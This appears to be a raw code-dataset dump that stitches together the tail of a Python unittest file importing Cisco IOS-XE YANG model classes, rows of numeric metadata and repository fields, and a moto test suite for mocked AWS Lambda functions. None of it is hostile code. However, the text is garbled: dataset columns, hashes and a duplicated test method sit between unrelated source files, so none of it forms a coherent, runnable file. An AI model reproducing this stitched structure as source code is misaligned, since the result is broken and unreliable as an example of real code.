def test_SNMP_TARGET_MIB(self):
from ydk.models.cisco_ios_xe.SNMP_TARGET_MIB import SNMPTARGETMIB
def test_SNMPv2_MIB(self):
from ydk.models.cisco_ios_xe.SNMPv2_MIB import SNMPv2MIB
def test_SNMPv2_TC(self):
from ydk.models.cisco_ios_xe.SNMPv2_TC import TruthValue
from ydk.models.cisco_ios_xe.SNMPv2_TC import RowStatus
from ydk.models.cisco_ios_xe.SNMPv2_TC import StorageType
def test_SONET_MIB(self):
from ydk.models.cisco_ios_xe.SONET_MIB import SONETMIB
def test_TCP_MIB(self):
from ydk.models.cisco_ios_xe.TCP_MIB import TCPMIB
def test_TOKENRING_MIB(self):
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5TestInsertFunc
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5TestFullDuplexLoopBack
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetIBM16
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetTItms380
from ydk.models.cisco_ios_xe.TOKENRING_MIB import Dot5ChipSetTItms380c16
from ydk.models.cisco_ios_xe.TOKENRING_MIB import TOKENRINGMIB
def test_TOKEN_RING_RMON_MIB(self):
from ydk.models.cisco_ios_xe.TOKEN_RING_RMON_MIB import EntryStatus
from ydk.models.cisco_ios_xe.TOKEN_RING_RMON_MIB import TOKENRINGRMONMIB
def test_TUNNEL_MIB(self):
from ydk.models.cisco_ios_xe.TUNNEL_MIB import TUNNELMIB
def test_UDP_MIB(self):
from ydk.models.cisco_ios_xe.UDP_MIB import UDPMIB
def test_VPN_TC_STD_MIB(self):
pass
def test_cisco_bridge_common(self):
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacLimitNotificationType
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifNone
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSnmpTrap
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSyslog
from ydk.models.cisco_ios_xe.cisco_bridge_common import NotifSyslogAndSnmpTrap
from ydk.models.cisco_ios_xe.cisco_bridge_common import EthTrafficClass
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacAgingType
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacLimitAction
from ydk.models.cisco_ios_xe.cisco_bridge_common import MacSecureAction
def test_cisco_bridge_domain(self):
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainStateType
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainConfig
from ydk.models.cisco_ios_xe.cisco_bridge_domain import BridgeDomainState
from ydk.models.cisco_ios_xe.cisco_bridge_domain import ClearBridgeDomain
from ydk.models.cisco_ios_xe.cisco_bridge_domain import ClearMacAddress
from ydk.models.cisco_ios_xe.cisco_bridge_domain import CreateParameterizedBridgeDomains
def test_cisco_ethernet(self):
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed10mb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed100mb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed1gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed10gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed40gb
from ydk.models.cisco_ios_xe.cisco_ethernet import EthIfSpeed100gb
def test_cisco_ia(self):
from ydk.models.cisco_ios_xe.cisco_ia import ParserMsgProcessingMethod
from ydk.models.cisco_ios_xe.cisco_ia import CiaSyncType
from ydk.models.cisco_ios_xe.cisco_ia import CiaLogLevel
from ydk.models.cisco_ios_xe.cisco_ia import OnepLogLevel
from ydk.models.cisco_ios_xe.cisco_ia import SyslogSeverity
from ydk.models.cisco_ios_xe.cisco_ia import SyncFrom
from ydk.models.cisco_ios_xe.cisco_ia import SaveConfig
from ydk.models.cisco_ios_xe.cisco_ia import IsSyncing
from ydk.models.cisco_ios_xe.cisco_ia import Checkpoint
from ydk.models.cisco_ios_xe.cisco_ia import Revert
from ydk.models.cisco_ios_xe.cisco_ia import Rollback
def test_cisco_ospf(self):
from ydk.models.cisco_ios_xe.cisco_ospf import OspfExternalType
from ydk.models.cisco_ios_xe.cisco_ospf import AccessListInOutType
from ydk.models.cisco_ios_xe.cisco_ospf import PrefixApplicability
from ydk.models.cisco_ios_xe.cisco_ospf import OspfLogAdj
def test_cisco_policy(self):
pass
def test_cisco_policy_filters(self):
pass
def test_cisco_policy_target(self):
pass
def test_cisco_pw(self):
from ydk.models.cisco_ios_xe.cisco_pw import PwEncapsulationType
from ydk.models.cisco_ios_xe.cisco_pw import PwEncapMpls
from ydk.models.cisco_ios_xe.cisco_pw import PwVcType
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeEther
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeVlan
from ydk.models.cisco_ios_xe.cisco_pw import PwVcTypeVlanPassthrough
from ydk.models.cisco_ios_xe.cisco_pw import PwLoadBalanceType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthernetType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthSrcMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthDstMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbEthSrcDstMac
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpType
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpSrcIp
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpDstIp
from ydk.models.cisco_ios_xe.cisco_pw import PwLbIpSrcDstIp
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolType
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolNone
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolLdp
from ydk.models.cisco_ios_xe.cisco_pw import PwSignalingProtocolBgp
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingType
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingReceive
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingTransmit
from ydk.models.cisco_ios_xe.cisco_pw import PwSequencingBoth
from ydk.models.cisco_ios_xe.cisco_pw import PwOperStateType
from ydk.models.cisco_ios_xe.cisco_pw import PseudowireConfig
from ydk.models.cisco_ios_xe.cisco_pw import PseudowireState
def test_cisco_routing_ext(self):
from ydk.models.cisco_ios_xe.cisco_routing_ext import Rip
from ydk.models.cisco_ios_xe.cisco_routing_ext import IsIs
from ydk.models.cisco_ios_xe.cisco_routing_ext import Bgp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Eigrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Igrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Nhrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Hsrp
from ydk.models.cisco_ios_xe.cisco_routing_ext import Lisp
def test_cisco_self_mgmt(self):
from ydk.models.cisco_ios_xe.cisco_self_mgmt import NetconfYang
def test_cisco_smart_license(self):
from ydk.models.cisco_ios_xe.cisco_smart_license import NotifRegisterFailureEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import RegistrationStateEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import AuthorizationStateEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import UtilityReportingTypeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import TransportTypeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import EnforcementModeEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import ErrorEnum
from ydk.models.cisco_ios_xe.cisco_smart_license import RegisterIdToken
from ydk.models.cisco_ios_xe.cisco_smart_license import DeRegister
from ydk.models.cisco_ios_xe.cisco_smart_license import RenewId
from ydk.models.cisco_ios_xe.cisco_smart_license import RenewAuth
from ydk.models.cisco_ios_xe.cisco_smart_license import Licensing
def test_cisco_smart_license_errors(self):
pass
def test_cisco_storm_control(self):
from ydk.models.cisco_ios_xe.cisco_storm_control import StormControlAction
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionDrop
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionSnmpTrap
from ydk.models.cisco_ios_xe.cisco_storm_control import ActionShutdown
def test_common_mpls_static(self):
from ydk.models.cisco_ios_xe.common_mpls_static import LspType
from ydk.models.cisco_ios_xe.common_mpls_static import LspIPv4
from ydk.models.cisco_ios_xe.common_mpls_static import LspIPv6
from ydk.models.cisco_ios_xe.common_mpls_static import LspVrf
from ydk.models.cisco_ios_xe.common_mpls_static import Lsp
from ydk.models.cisco_ios_xe.common_mpls_static import NexthopResolutionType
from ydk.models.cisco_ios_xe.common_mpls_static import StaticNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import BgpRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import OspfRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import IsisRouteNexthop
from ydk.models.cisco_ios_xe.common_mpls_static import Hoptype
from ydk.models.cisco_ios_xe.common_mpls_static import MplsStatic
def test_common_mpls_types(self):
from ydk.models.cisco_ios_xe.common_mpls_types import IetfMplsLabel
def test_nvo(self):
from ydk.models.cisco_ios_xe.nvo import OverlayEncapType
from ydk.models.cisco_ios_xe.nvo import VxlanType
from ydk.models.cisco_ios_xe.nvo import NvgreType
from ydk.models.cisco_ios_xe.nvo import NvoInstances
def test_pim(self):
from ydk.models.cisco_ios_xe.pim import GroupToRpMappingMode
from ydk.models.cisco_ios_xe.pim import DmMappingMode
from ydk.models.cisco_ios_xe.pim import SmMappingMode
from ydk.models.cisco_ios_xe.pim import PimBidirMappingMode
from ydk.models.cisco_ios_xe.pim import SsmMappingMode
from ydk.models.cisco_ios_xe.pim import AsmMappingMode
from ydk.models.cisco_ios_xe.pim import OtherMappingMode
from ydk.models.cisco_ios_xe.pim import RouteProtocolType
from ydk.models.cisco_ios_xe.pim import MrouteProtocolType
from ydk.models.cisco_ios_xe.pim import PimMode
from ydk.models.cisco_ios_xe.pim import Origin
def test_policy_attr(self):
pass
def test_policy_types(self):
from ydk.models.ietf.policy_types import PolicyType
from ydk.models.ietf.policy_types import Qos
from ydk.models.ietf.policy_types import Pbr
from ydk.models.ietf.policy_types import PerfMon
from ydk.models.ietf.policy_types import AccessControl
from ydk.models.ietf.policy_types import Appnav
from ydk.models.ietf.policy_types import Control
from ydk.models.ietf.policy_types import Inspect
from ydk.models.ietf.policy_types import PacketService
from ydk.models.ietf.policy_types import Service
from ydk.models.ietf.policy_types import ClassType
from ydk.models.ietf.policy_types import QosClass
from ydk.models.ietf.policy_types import AccessControlClass
from ydk.models.ietf.policy_types import AppnavClass
from ydk.models.ietf.policy_types import ControlClass
from ydk.models.ietf.policy_types import InspectClass
from ydk.models.ietf.policy_types import Cos
from ydk.models.ietf.policy_types import CosInner
from ydk.models.ietf.policy_types import Ipv4AclName
from ydk.models.ietf.policy_types import Ipv6AclName
from ydk.models.ietf.policy_types import Ipv4Acl
from ydk.models.ietf.policy_types import Ipv6Acl
from ydk.models.ietf.policy_types import InputInterface
from ydk.models.ietf.policy_types import SrcMac
from ydk.models.ietf.policy_types import DstMac
from ydk.models.ietf.policy_types import MplsExpTop
from ydk.models.ietf.policy_types import MplsExpImp
from ydk.models.ietf.policy_types import PacketLength
from ydk.models.ietf.policy_types import Prec
from ydk.models.ietf.policy_types import QosGroup
from ydk.models.ietf.policy_types import Vlan
from ydk.models.ietf.policy_types import VlanInner
from ydk.models.ietf.policy_types import AtmClp
from ydk.models.ietf.policy_types import AtmVci
from ydk.models.ietf.policy_types import Dei
from ydk.models.ietf.policy_types import DeiInner
from ydk.models.ietf.policy_types import FlowIp
from ydk.models.ietf.policy_types import FlowRecord
from ydk.models.ietf.policy_types import FlowDe
from ydk.models.ietf.policy_types import FlowDlci
from ydk.models.ietf.policy_types import WlanUserPriority
from ydk.models.ietf.policy_types import DiscardClass
from ydk.models.ietf.policy_types import ClassMap
from ydk.models.ietf.policy_types import Metadata
from ydk.models.ietf.policy_types import Application
from ydk.models.ietf.policy_types import SecurityGroupName
from ydk.models.ietf.policy_types import SecurityGroupTag
from ydk.models.ietf.policy_types import IpRtp
from ydk.models.ietf.policy_types import Vpls
from ydk.models.ietf.policy_types import Metric
from ydk.models.ietf.policy_types import RateUnit
from ydk.models.ietf.policy_types import Direction
def test_policy_types(self):
from ydk.models.ietf.policy_types import PolicyType
from ydk.models.ietf.policy_types import Qos
from ydk.models.ietf.policy_types import Pbr
from ydk.models.ietf.policy_types import PerfMon
from ydk.models.ietf.policy_types import AccessControl
from ydk.models.ietf.policy_types import Appnav
from ydk.models.ietf.policy_types import Control
from ydk.models.ietf.policy_types import Inspect
from ydk.models.ietf.policy_types import PacketService
from ydk.models.ietf.policy_types import Service
from ydk.models.ietf.policy_types import ClassType
from ydk.models.ietf.policy_types import QosClass
from ydk.models.ietf.policy_types import AccessControlClass
from ydk.models.ietf.policy_types import AppnavClass
from ydk.models.ietf.policy_types import ControlClass
from ydk.models.ietf.policy_types import InspectClass
from ydk.models.ietf.policy_types import Cos
from ydk.models.ietf.policy_types import CosInner
from ydk.models.ietf.policy_types import Ipv4AclName
from ydk.models.ietf.policy_types import Ipv6AclName
from ydk.models.ietf.policy_types import Ipv4Acl
from ydk.models.ietf.policy_types import Ipv6Acl
from ydk.models.ietf.policy_types import InputInterface
from ydk.models.ietf.policy_types import SrcMac
from ydk.models.ietf.policy_types import DstMac
from ydk.models.ietf.policy_types import MplsExpTop
from ydk.models.ietf.policy_types import MplsExpImp
from ydk.models.ietf.policy_types import PacketLength
from ydk.models.ietf.policy_types import Prec
from ydk.models.ietf.policy_types import QosGroup
from ydk.models.ietf.policy_types import Vlan
from ydk.models.ietf.policy_types import VlanInner
from ydk.models.ietf.policy_types import AtmClp
from ydk.models.ietf.policy_types import AtmVci
from ydk.models.ietf.policy_types import Dei
from ydk.models.ietf.policy_types import DeiInner
from ydk.models.ietf.policy_types import FlowIp
from ydk.models.ietf.policy_types import FlowRecord
from ydk.models.ietf.policy_types import FlowDe
from ydk.models.ietf.policy_types import FlowDlci
from ydk.models.ietf.policy_types import WlanUserPriority
from ydk.models.ietf.policy_types import DiscardClass
from ydk.models.ietf.policy_types import ClassMap
from ydk.models.ietf.policy_types import Metadata
from ydk.models.ietf.policy_types import Application
from ydk.models.ietf.policy_types import SecurityGroupName
from ydk.models.ietf.policy_types import SecurityGroupTag
from ydk.models.ietf.policy_types import IpRtp
from ydk.models.ietf.policy_types import Vpls
from ydk.models.ietf.policy_types import Metric
from ydk.models.ietf.policy_types import RateUnit
from ydk.models.ietf.policy_types import Direction
def test_tailf_cli_extensions(self):
pass
def test_tailf_common(self):
pass
def test_tailf_common_monitoring(self):
pass
def test_tailf_common_query(self):
pass
def test_tailf_confd_monitoring(self):
from ydk.models.cisco_ios_xe.tailf_confd_monitoring import ConfdState
def test_tailf_meta_extensions(self):
pass
def test_tailf_netconf_inactive(self):
pass
def test_tailf_netconf_monitoring(self):
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliConsole
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliSsh
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import CliTcp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import WebuiHttp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import WebuiHttps
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import NetconfTcp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import SnmpUdp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import RestHttp
from ydk.models.cisco_ios_xe.tailf_netconf_monitoring import RestHttps
def test_tailf_netconf_query(self):
from ydk.models.cisco_ios_xe.tailf_netconf_query import StartQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import FetchQueryResult
from ydk.models.cisco_ios_xe.tailf_netconf_query import ImmediateQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import ResetQuery
from ydk.models.cisco_ios_xe.tailf_netconf_query import StopQuery
def test_tailf_netconf_transactions(self):
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import StartTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import PrepareTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import CommitTransaction
from ydk.models.cisco_ios_xe.tailf_netconf_transactions import AbortTransaction
def test_tailf_rest_error(self):
pass
def test_tailf_rest_query(self):
pass
def test_tailf_xsd_types(self):
pass
if __name__ == '__main__':
unittest.main()
| 41.209221
| 115
| 0.785254
| 14,084
| 94,740
| 4.868858
| 0.088966
| 0.152013
| 0.190016
| 0.233882
| 0.736996
| 0.712598
| 0.694661
| 0.666939
| 0.638881
| 0.528182
| 0
| 0.003055
| 0.17073
| 94,740
| 2,298
| 116
| 41.227154
| 0.869764
| 0
| 0
| 0.150232
| 0
| 0
| 0.000084
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.258769
| false
| 0.080741
| 0.659828
| 0
| 0.919259
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ce8892dc9f3de1fed384e61657f0b3e13aaf1818
| 13,752
|
py
|
Python
|
tests/test_awslambda/test_lambda.py
|
argos83/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | 1
|
2021-03-06T22:01:41.000Z
|
2021-03-06T22:01:41.000Z
|
tests/test_awslambda/test_lambda.py
|
marciogh/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | null | null | null |
tests/test_awslambda/test_lambda.py
|
marciogh/moto
|
d3df810065c9c453d40fcc971f9be6b7b2846061
|
[
"Apache-2.0"
] | 1
|
2017-10-19T00:53:28.000Z
|
2017-10-19T00:53:28.000Z
|
from __future__ import unicode_literals
import base64
import botocore.client
import boto3
import hashlib
import io
import json
import zipfile
import sure # noqa
from freezegun import freeze_time
from moto import mock_lambda, mock_s3, mock_ec2
def _process_lamda(pfunc):
zip_output = io.BytesIO()
zip_file = zipfile.ZipFile(zip_output, 'w', zipfile.ZIP_DEFLATED)
zip_file.writestr('lambda_function.zip', pfunc)
zip_file.close()
zip_output.seek(0)
return zip_output.read()
def get_test_zip_file1():
pfunc = """
def lambda_handler(event, context):
return event
"""
return _process_lamda(pfunc)
def get_test_zip_file2():
pfunc = """
def lambda_handler(event, context):
volume_id = event.get('volume_id')
print('get volume details for %s' % volume_id)
import boto3
ec2 = boto3.resource('ec2', region_name='us-west-2')
vol = ec2.Volume(volume_id)
print('Volume - %s state=%s, size=%s' % (volume_id, vol.state, vol.size))
return event
"""
return _process_lamda(pfunc)
@mock_lambda
@mock_s3
def test_list_functions():
conn = boto3.client('lambda', 'us-west-2')
result = conn.list_functions()
result['Functions'].should.have.length_of(0)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_requestresponse_function():
conn = boto3.client('lambda', 'us-west-2')
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'ZipFile': get_test_zip_file1(),
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {'msg': 'So long and thanks for all the fish'}
success_result = conn.invoke(FunctionName='testFunction', InvocationType='RequestResponse',
Payload=json.dumps(in_data))
success_result["StatusCode"].should.equal(202)
base64.b64decode(success_result["LogResult"]).decode('utf-8').should.equal(json.dumps(in_data))
json.loads(success_result["Payload"].read().decode('utf-8')).should.equal(in_data)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_event_function():
conn = boto3.client('lambda', 'us-west-2')
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'ZipFile': get_test_zip_file1(),
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
conn.invoke.when.called_with(
FunctionName='notAFunction',
InvocationType='Event',
Payload='{}'
).should.throw(botocore.client.ClientError)
in_data = {'msg': 'So long and thanks for all the fish'}
success_result = conn.invoke(FunctionName='testFunction', InvocationType='Event', Payload=json.dumps(in_data))
success_result["StatusCode"].should.equal(202)
json.loads(success_result['Payload'].read().decode('utf-8')).should.equal({})
@mock_ec2
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_invoke_function_get_ec2_volume():
conn = boto3.resource("ec2", "us-west-2")
vol = conn.create_volume(Size=99, AvailabilityZone='us-west-2')
vol = conn.Volume(vol.id)
conn = boto3.client('lambda', 'us-west-2')
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'ZipFile': get_test_zip_file2(),
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
in_data = {'volume_id': vol.id}
result = conn.invoke(FunctionName='testFunction', InvocationType='RequestResponse', Payload=json.dumps(in_data))
result["StatusCode"].should.equal(202)
msg = 'get volume details for %s\nVolume - %s state=%s, size=%s\n%s' % (vol.id, vol.id, vol.state, vol.size, json.dumps(in_data))
base64.b64decode(result["LogResult"]).decode('utf-8').should.equal(msg)
result['Payload'].read().decode('utf-8').should.equal(msg)
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_create_based_on_s3_with_missing_bucket():
conn = boto3.client('lambda', 'us-west-2')
conn.create_function.when.called_with(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'S3Bucket': 'this-bucket-does-not-exist',
'S3Key': 'test.zip',
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
VpcConfig={
"SecurityGroupIds": ["sg-123abc"],
"SubnetIds": ["subnet-123abc"],
},
).should.throw(botocore.client.ClientError)
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_create_function_from_aws_bucket():
s3_conn = boto3.client('s3', 'us-west-2')
s3_conn.create_bucket(Bucket='test-bucket')
zip_content = get_test_zip_file2()
s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
conn = boto3.client('lambda', 'us-west-2')
result = conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'S3Bucket': 'test-bucket',
'S3Key': 'test.zip',
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
VpcConfig={
"SecurityGroupIds": ["sg-123abc"],
"SubnetIds": ["subnet-123abc"],
},
)
result['ResponseMetadata'].pop('HTTPHeaders', None) # this is hard to match against, so remove it
result['ResponseMetadata'].pop('RetryAttempts', None) # Botocore inserts retry attempts not seen in Python27
result.should.equal({
'FunctionName': 'testFunction',
'FunctionArn': 'arn:aws:lambda:123456789012:function:testFunction',
'Runtime': 'python2.7',
'Role': 'test-iam-role',
'Handler': 'lambda_function.handler',
"CodeSha256": hashlib.sha256(zip_content).hexdigest(),
"CodeSize": len(zip_content),
'Description': 'test lambda function',
'Timeout': 3,
'MemorySize': 128,
'LastModified': '2015-01-01 00:00:00',
'Version': '$LATEST',
'VpcConfig': {
"SecurityGroupIds": ["sg-123abc"],
"SubnetIds": ["subnet-123abc"],
"VpcId": "vpc-123abc"
},
'ResponseMetadata': {'HTTPStatusCode': 201},
})
@mock_lambda
@freeze_time('2015-01-01 00:00:00')
def test_create_function_from_zipfile():
conn = boto3.client('lambda', 'us-west-2')
zip_content = get_test_zip_file1()
result = conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'ZipFile': zip_content,
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
result['ResponseMetadata'].pop('HTTPHeaders', None) # this is hard to match against, so remove it
result['ResponseMetadata'].pop('RetryAttempts', None) # Botocore inserts retry attempts not seen in Python27
result.should.equal({
'FunctionName': 'testFunction',
'FunctionArn': 'arn:aws:lambda:123456789012:function:testFunction',
'Runtime': 'python2.7',
'Role': 'test-iam-role',
'Handler': 'lambda_function.handler',
'CodeSize': len(zip_content),
'Description': 'test lambda function',
'Timeout': 3,
'MemorySize': 128,
'LastModified': '2015-01-01 00:00:00',
'CodeSha256': hashlib.sha256(zip_content).hexdigest(),
'Version': '$LATEST',
'VpcConfig': {
"SecurityGroupIds": [],
"SubnetIds": [],
},
'ResponseMetadata': {'HTTPStatusCode': 201},
})
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_get_function():
s3_conn = boto3.client('s3', 'us-west-2')
s3_conn.create_bucket(Bucket='test-bucket')
zip_content = get_test_zip_file1()
s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
conn = boto3.client('lambda', 'us-west-2')
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'S3Bucket': 'test-bucket',
'S3Key': 'test.zip',
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
result = conn.get_function(FunctionName='testFunction')
result['ResponseMetadata'].pop('HTTPHeaders', None) # this is hard to match against, so remove it
result['ResponseMetadata'].pop('RetryAttempts', None) # Botocore inserts retry attempts not seen in Python27
result.should.equal({
"Code": {
"Location": "s3://lambda-functions.aws.amazon.com/test.zip",
"RepositoryType": "S3"
},
"Configuration": {
"CodeSha256": hashlib.sha256(zip_content).hexdigest(),
"CodeSize": len(zip_content),
"Description": "test lambda function",
"FunctionArn": "arn:aws:lambda:123456789012:function:testFunction",
"FunctionName": "testFunction",
"Handler": "lambda_function.handler",
"LastModified": "2015-01-01 00:00:00",
"MemorySize": 128,
"Role": "test-iam-role",
"Runtime": "python2.7",
"Timeout": 3,
"Version": '$LATEST',
"VpcConfig": {
"SecurityGroupIds": [],
"SubnetIds": [],
}
},
'ResponseMetadata': {'HTTPStatusCode': 200},
})
@mock_lambda
@mock_s3
def test_delete_function():
s3_conn = boto3.client('s3', 'us-west-2')
s3_conn.create_bucket(Bucket='test-bucket')
zip_content = get_test_zip_file2()
s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
conn = boto3.client('lambda', 'us-west-2')
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'S3Bucket': 'test-bucket',
'S3Key': 'test.zip',
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
success_result = conn.delete_function(FunctionName='testFunction')
success_result['ResponseMetadata'].pop('HTTPHeaders', None) # this is hard to match against, so remove it
success_result['ResponseMetadata'].pop('RetryAttempts', None) # Botocore inserts retry attempts not seen in Python27
success_result.should.equal({'ResponseMetadata': {'HTTPStatusCode': 204}})
conn.delete_function.when.called_with(FunctionName='testFunctionThatDoesntExist').should.throw(botocore.client.ClientError)
@mock_lambda
@mock_s3
@freeze_time('2015-01-01 00:00:00')
def test_list_create_list_get_delete_list():
"""
test `list -> create -> list -> get -> delete -> list` integration
"""
s3_conn = boto3.client('s3', 'us-west-2')
s3_conn.create_bucket(Bucket='test-bucket')
zip_content = get_test_zip_file2()
s3_conn.put_object(Bucket='test-bucket', Key='test.zip', Body=zip_content)
conn = boto3.client('lambda', 'us-west-2')
conn.list_functions()['Functions'].should.have.length_of(0)
conn.create_function(
FunctionName='testFunction',
Runtime='python2.7',
Role='test-iam-role',
Handler='lambda_function.handler',
Code={
'S3Bucket': 'test-bucket',
'S3Key': 'test.zip',
},
Description='test lambda function',
Timeout=3,
MemorySize=128,
Publish=True,
)
expected_function_result = {
"Code": {
"Location": "s3://lambda-functions.aws.amazon.com/test.zip",
"RepositoryType": "S3"
},
"Configuration": {
"CodeSha256": hashlib.sha256(zip_content).hexdigest(),
"CodeSize": len(zip_content),
"Description": "test lambda function",
"FunctionArn": "arn:aws:lambda:123456789012:function:testFunction",
"FunctionName": "testFunction",
"Handler": "lambda_function.handler",
"LastModified": "2015-01-01 00:00:00",
"MemorySize": 128,
"Role": "test-iam-role",
"Runtime": "python2.7",
"Timeout": 3,
"Version": '$LATEST',
"VpcConfig": {
"SecurityGroupIds": [],
"SubnetIds": [],
}
},
'ResponseMetadata': {'HTTPStatusCode': 200},
}
conn.list_functions()['Functions'].should.equal([expected_function_result['Configuration']])
func = conn.get_function(FunctionName='testFunction')
func['ResponseMetadata'].pop('HTTPHeaders', None) # this is hard to match against, so remove it
func['ResponseMetadata'].pop('RetryAttempts', None) # Botocore inserts retry attempts not seen in Python27
func.should.equal(expected_function_result)
conn.delete_function(FunctionName='testFunction')
conn.list_functions()['Functions'].should.have.length_of(0)
| 32.665083
| 134
| 0.618965
| 1,529
| 13,752
| 5.41792
| 0.124264
| 0.04563
| 0.014365
| 0.023539
| 0.862989
| 0.809874
| 0.763761
| 0.728875
| 0.724288
| 0.709319
| 0
| 0.045817
| 0.233421
| 13,752
| 420
| 135
| 32.742857
| 0.739992
| 0.040503
| 0
| 0.712707
| 0
| 0.005525
| 0.314474
| 0.058323
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035912
| false
| 0
| 0.033149
| 0
| 0.082873
| 0.005525
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cec2afb657e979ae9386b3f7aa6db4346b2bb2df
| 1,806
|
py
|
Python
|
docs/source/examples/flashblade/get_array_connections_performance_replication.py
|
